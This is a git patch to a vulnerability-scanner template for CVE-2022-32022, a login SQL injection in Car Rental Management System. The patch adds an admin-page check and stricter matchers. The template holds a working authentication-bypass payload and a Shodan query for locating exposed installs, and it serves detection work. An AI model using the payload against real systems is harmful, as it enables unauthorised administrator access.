From 1b01dcf6b9b62432b187e422afd28abaa1a7b77c Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 2 Aug 2022 12:22:12 +0530
Subject: [PATCH] Update CVE-2022-32022.yaml

---
 cves/2022/CVE-2022-32022.yaml | 22 +++++++++++++---------
 1 file changed, 13 insertions(+), 9 deletions(-)

diff --git a/cves/2022/CVE-2022-32022.yaml b/cves/2022/CVE-2022-32022.yaml
index dc0b421de5..f8578b500d 100644
--- a/cves/2022/CVE-2022-32022.yaml
+++ b/cves/2022/CVE-2022-32022.yaml
@@ -7,11 +7,12 @@ info:
   description: |
     Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/ajax.php?action=login.
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32022
+    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32022
   metadata:
+    verified: true
     shodan-query: http.html:"Car Rental Management System"
-    verified: "true"
-  tags: sql,cve,cms,2022
+  tags: cve,cve2022,carrental,cms,sqli,authenticated
 
 requests:
   - raw:
@@ -22,17 +23,20 @@ requests:
 
         username=admin'+or+'1'%3D'1'%23&password=admin
 
+      - |
+        GET /admin/index.php?page=home HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '1'
-
-      - type: word
-        part: header
-        words:
-          - text/html
+          - 'Welcome back Administrator!'
+          - 'action=logout'
+          - 'Manage Account'
+        condition: and
 
       - type: status
         status: